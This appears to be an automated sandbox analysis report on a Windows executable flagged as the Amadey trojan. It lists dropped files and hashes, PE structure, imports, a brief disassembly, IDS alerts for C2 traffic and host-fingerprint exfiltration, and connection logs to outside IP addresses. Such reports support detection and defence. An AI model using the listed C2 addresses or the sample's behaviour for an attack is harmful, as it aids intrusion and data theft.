                  SHA-256:1F747C550E288AAF3336FFDA8E452F4510DC50E20DFD882E6A12DE905137435D
                  SHA-512:C30191AE7EC48E60380E656E9E410E67BD5F24C0570EB4FBBA02DEAB7CF7C30F28BF2ECB29DE25AA3FD3B6CA65380D25ADA52E7C22FF61F53C98F927AB9985AA
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4593
                  Entropy (8bit):4.463626074203829
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYuAoYm8M4J4AOqFdoSI+q8FiOXPsJLYhsd:uIjfLI7+S7VzAFJdeSI/gPsFYhsd
                  MD5:D903550EBB3CD981302F2B69F88CDFAB
                  SHA1:0A0B4FB67885ADC0D0E0AE65F01641B894252923
                  SHA-256:32E721C81EA095914EA4F4109D050C07BC91EF0DF5B0FBEF0AFB287CC6B09A16
                  SHA-512:324AB1008BEC5F596ED2B24D2E73D361C613EDB5C57D3F1C9064D8F29A049FB40F7234E92A63E6726961A1551C1D956C7A166BD9D6B271626661E2C9EF7531D0
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:35:10 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):24848
                  Entropy (8bit):2.549437358568257
                  Encrypted:false
                  SSDEEP:192:axT3hKfXDoNdjeO4PK15k9nhvxw4uTIF5EE:Kh4oZSKI9nNC4QE
                  MD5:094791DC5AD18D9E748BFFCD26960A68
                  SHA1:D1E761D26B9CCD3BAEE08364EA0301E55FC22446
                  SHA-256:1932003D378B493BE8CEEFD665CC1BA760A0AC58BCA6C607B63C46A993EC625F
                  SHA-512:FBEE533063B08A07D4C356CFE7B1E12460B2BD75A5081E280CACDD1014AE8E55FCDB95442C665615928244B99B19C10F518660D75E73D341FB4EFA10DE47824E
                  Malicious:false
                  Preview:MDMP..a..... ..........f............4...............<...........<...........T.......8...........T...............hN..........8...........$...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8336
                  Entropy (8bit):3.6963149716048074
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJz+6IjP6YPCz6XfjgmfzqppDRC89bDvsfPBm:R6lXJK6IjP6Y26Xrgmfzql7DUf0
                  MD5:E3B2BCDF9CC15B3A030CA8936C164EBC
                  SHA1:2621D1CB830582481366C9C070786A94B8F363F8
                  SHA-256:6DDC4CA7D1E00009CBE54D88B79763CADCA22560E8DB7D4250765F0DA1A85090
                  SHA-512:007FB6B0993A63180D2289875C0131CA4E3FF1AA85E23E783253972D763FFA42A28AD1311E92966E0560BED83C6AA384CD6CCD263ACFD18842BC664A6048B507
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.2.4.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4603
                  Entropy (8bit):4.470068177748451
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYAYm8M4J0oOqFuO+q87MOC1CBHIN9d:uIjfLI7+S7VMJVffZ1CVIN9d
                  MD5:20EA439536B3BF9AF44BD69FF52616B0
                  SHA1:FB7617A4B3ABCAAB6CEFEA907367DA6E4E56D140
                  SHA-256:AFBEE53A4A4FB0212085D75F47606381F290C1651554812C6DC393E4E3D56B73
                  SHA-512:89CE246BB2AE50F64C7FA3A08D248B9FF268AFD2A3DB97F5C2009D8B5BA1868EB97A716775D360B866EEDE8156E5E947A89E93C9767B54EE1E97335A23B3B3B7
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):302
                  Entropy (8bit):3.4076108365068194
                  Encrypted:false
                  SSDEEP:6:0CPtXUhXUEZ+lX1avetE9+AQy0l1FNzt0:RPZ4Q1a/9+nV1Tt0
                  MD5:304F60C96F124ADAC6DDAD50310CF2A8
                  SHA1:42002666D6ACB4B2D818C75C59A8ECAF54E82301
                  SHA-256:F1BFC9386BDB60000B6AB52EECDC6C4A265F294159650F77CA6AFF802B8E96B2
                  SHA-512:7BF7658CACC93ABCEE8D2AB87BB62EBB6C72A71A92B064B565C63A020AFD9AE0B192DBC86D0E5FE23BE0E655BA8ADD0E48A8747D9F49638140D0344DE5734187
                  Malicious:false
                  Preview:.....n)..5.@...b...F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.3.b.c.a.5.8.c.e.c.e.\.H.k.b.s.s.e...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................#.@3P.........................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.471258259758481
                  Encrypted:false
                  SSDEEP:6144:czZfpi6ceLPx9skLmb0fjZWSP3aJG8nAgeiJRMMhA2zX4WABluuNDjDH5S:iZHtjZWOKnMM6bFpdj4
                  MD5:486FF979042DA0DFD0B40CC413734C62
                  SHA1:4AC12A54E8C43EBAF32E80D68761985323CB3938
                  SHA-256:7E3FBDC624E4E1B0BEA1F358639EF42201A387F1D30348F4E583D2536E9700F8
                  SHA-512:4B57926D842DF5F701DD1C19E2993DB07D3017F92634327172E976B85B3209699D5EA639A9CC81691515EC2064A3A70C852CE7C42A0FA92085A7A67E6EB8A9E9
                  Malicious:false
                  Preview:regfU...U....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmRK..................................................................................................................................................................................................................................................................................................................................................*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.893749042518846
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:439'808 bytes
                  MD5:233ea23b1c1587f1cf895f08ba6da10b
                  SHA1:e2b5131d03aa3bc56a004ba6debc6d57322e0691
                  SHA256:c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c
                  SHA512:4f1d72732e8ea42665b325060b1dcbe8bd47b7fb78ba9e9be9d5da8c9be97206bce8b9fd319a95cd9514fa2ff58eb9194068bde09af4bef0e6d3435562e647a9
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  TLSH:C194F152B5F1C837D1779A372A289A61D53EBD01F774C19B229C022F2EB16D08A39377
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................}.......H.......|.......E...............y.......L.......K.....Rich....................PE..L......e...........
                  Icon Hash:63796de971436e0f
                  Entrypoint:0x402197
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x65A0EF1B [Fri Jan 12 07:49:47 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:def745e62858e9ac0dee4801e550d289
                  Instruction
                  call 00007F5658D1A8F8h
                  jmp 00007F5658D1923Eh
                  push edi
                  mov eax, esi
                  and eax, 0Fh
                  test eax, eax
                  jne 00007F5658D19477h
                  mov edx, ecx
                  and ecx, 7Fh
                  shr edx, 07h
                  je 00007F5658D19417h
                  jmp 00007F5658D193B8h
                  lea ebx, dword ptr [ebx+00000000h]
                  movdqa xmm0, dqword ptr [esi]
                  movdqa xmm1, dqword ptr [esi+10h]
                  movdqa xmm2, dqword ptr [esi+20h]
                  movdqa xmm3, dqword ptr [esi+30h]
                  movdqa dqword ptr [edi], xmm0
                  movdqa dqword ptr [edi+10h], xmm1
                  movdqa dqword ptr [edi+20h], xmm2
                  movdqa dqword ptr [edi+30h], xmm3
                  movdqa xmm4, dqword ptr [esi+40h]
                  movdqa xmm5, dqword ptr [esi+50h]
                  movdqa xmm6, dqword ptr [esi+60h]
                  movdqa xmm7, dqword ptr [esi+70h]
                  movdqa dqword ptr [edi+40h], xmm4
                  movdqa dqword ptr [edi+50h], xmm5
                  movdqa dqword ptr [edi+60h], xmm6
                  movdqa dqword ptr [edi+70h], xmm7
                  lea esi, dword ptr [esi+00000080h]
                  lea edi, dword ptr [edi+00000080h]
                  dec edx
                  jne 00007F5658D19355h
                  test ecx, ecx
                  je 00007F5658D193FBh
                  mov edx, ecx
                  shr edx, 04h
                  test edx, edx
                  je 00007F5658D193C9h
                  lea ebx, dword ptr [ebx+00000000h]
                  movdqa xmm0, dqword ptr [esi]
                  movdqa dqword ptr [edi], xmm0
                  lea esi, dword ptr [esi+10h]
                  lea edi, dword ptr [edi+10h]
                  dec edx
                  jne 00007F5658D193A1h
                  and ecx, 0Fh
                  je 00007F5658D193D6h
                  mov eax, ecx
                  shr ecx, 02h
                  je 00007F5658D193BFh
                  mov edx, dword ptr [esi]
                  mov dword ptr [edi], edx
                  lea esi, dword ptr [esi+04h]
                  lea edi, dword ptr [edi+04h]
                  dec ecx
                  jne 00007F5658D193A5h
                  mov ecx, eax
                  and ecx, 00000000h
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x436cc | 0x78 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x244e000 | 0x4028 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x43744 | 0x1c | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x431f8 | 0x18 | .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x431b0 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x41000 | 0x17c | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x3f7be | 0x3f800 | 5e6c45c389e975b3511553e29b545a4e | False | 0.9538055179625984 | data | 7.941071191359724 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x41000 | 0x2f92 | 0x3000 | 2f8947136709156b9a322c8c3417beaa | False | 0.353515625 | data | 5.008260745693812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x44000 | 0x24093e4 | 0x24800 | 0a49b2425224ca5219d0fc5da707aeef | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x244e000 | 0x4028 | 0x4200 | 8dca4281245eda7b16fec646f0587cde | False | 0.43507339015151514 | data | 3.977338616643711 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0x244e240 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Japanese | Japan | 0.5276497695852534
                  RT_ICON | 0x244e908 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Japanese | Japan | 0.4109958506224066
                  RT_ICON | 0x2450eb0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Japanese | Japan | 0.4521276595744681
                  RT_DIALOG | 0x24515d0 | 0x58 | data | | | 0.8977272727272727
                  RT_STRING | 0x2451628 | 0x51a | data | Japanese | Japan | 0.45252679938744256
                  RT_STRING | 0x2451b48 | 0x1b4 | Matlab v4 mat-file (little endian), numeric, rows 0, columns 0 | Japanese | Japan | 0.5114678899082569
                  RT_STRING | 0x2451d00 | 0x322 | data | Japanese | Japan | 0.45885286783042395
                  RT_GROUP_ICON | 0x2451318 | 0x30 | data | Japanese | Japan | 0.9375
                  RT_VERSION | 0x2451348 | 0x288 | data | | | 0.5308641975308642
                  DLL | Import
                  KERNEL32.dll | FindResourceW, LocalCompact, WriteConsoleInputA, GetModuleHandleW, GetWindowsDirectoryA, GetDateFormatA, SetProcessPriorityBoost, LoadLibraryW, FreeConsole, CreateEventA, GetModuleFileNameW, GetACP, IsBadStringPtrA, ReplaceFileA, CreateDirectoryA, GetLastError, SetLastError, SetEndOfFile, GlobalFree, CreateFileMappingA, LocalAlloc, AddVectoredExceptionHandler, GlobalFindAtomW, EnumResourceTypesW, GetWindowsDirectoryW, SetFileAttributesW, RaiseException, HeapReAlloc, HeapAlloc, GetStringTypeW, MultiByteToWideChar, CommConfigDialogA, GetProcAddress, CreateFileA, LCMapStringW, HeapSize, RtlUnwind, Sleep, IsValidCodePage, HeapFree, GetCommandLineA, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, HeapCreate, SetUnhandledExceptionFilter, ExitProcess, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, UnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, LeaveCriticalSection, EnterCriticalSection, GetCPInfo, GetOEMCP
                  USER32.dll | GetKeyboardLayoutNameA, SetMessageExtraInfo, GetCaretPos, CharUpperBuffA, GetClassInfoW, InsertMenuItemW, ShowCursor
                  ADVAPI32.dll | CopySid, ClearEventLogA
                  ole32.dll | CoSuspendClassObjects, CoUnmarshalHresult
                  WINHTTP.dll | WinHttpOpen
                  Language of compilation system | Country where language is spoken
                  Japanese | Japan
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  07/10/24-17:36:06.824712 | TCP | 2856147 | ETPRO TROJAN Amadey CnC Activity M3 | 49725 | 80 | 192.168.2.6 | 185.208.158.116
                  07/10/24-17:36:11.618807 | TCP | 2856122 | ETPRO TROJAN Amadey CnC Response M1 | 80 | 49729 | 89.23.103.42 | 192.168.2.6
                  07/10/24-17:36:13.149160 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49734 | 80 | 192.168.2.6 | 89.23.103.42
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 10, 2024 17:36:06.819170952 CEST | 49724 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:06.819199085 CEST | 49725 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:06.819338083 CEST | 49726 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:06.824479103 CEST | 80 | 49724 | 89.23.103.42 | 192.168.2.6
                  Jul 10, 2024 17:36:06.824502945 CEST | 80 | 49725 | 185.208.158.116 | 192.168.2.6
                  Jul 10, 2024 17:36:06.824512005 CEST | 80 | 49726 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:06.824584961 CEST | 49724 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:06.824609995 CEST | 49725 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:06.824685097 CEST | 49726 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:06.824712038 CEST | 49725 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:06.824728012 CEST | 49724 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:06.824901104 CEST | 49726 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:06.829830885 CEST | 80 | 49725 | 185.208.158.116 | 192.168.2.6
                  Jul 10, 2024 17:36:06.829858065 CEST | 80 | 49724 | 89.23.103.42 | 192.168.2.6
                  Jul 10, 2024 17:36:06.829865932 CEST | 80 | 49726 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:08.420578003 CEST | 80 | 49726 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:08.420713902 CEST | 49726 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:08.421427965 CEST | 49726 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:08.423541069 CEST | 49727 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:08.427517891 CEST | 80 | 49726 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:08.430056095 CEST | 80 | 49727 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:08.430135965 CEST | 49727 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:08.430263042 CEST | 49727 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:08.435141087 CEST | 80 | 49727 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.050199032 CEST | 80 | 49727 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.050427914 CEST | 49727 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.050429106 CEST | 49727 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.058446884 CEST | 80 | 49727 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.166362047 CEST | 49728 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.171948910 CEST | 80 | 49728 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.172063112 CEST | 49728 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.172163010 CEST | 49728 | 80 | 192.168.2.6 | 185.209.162.226
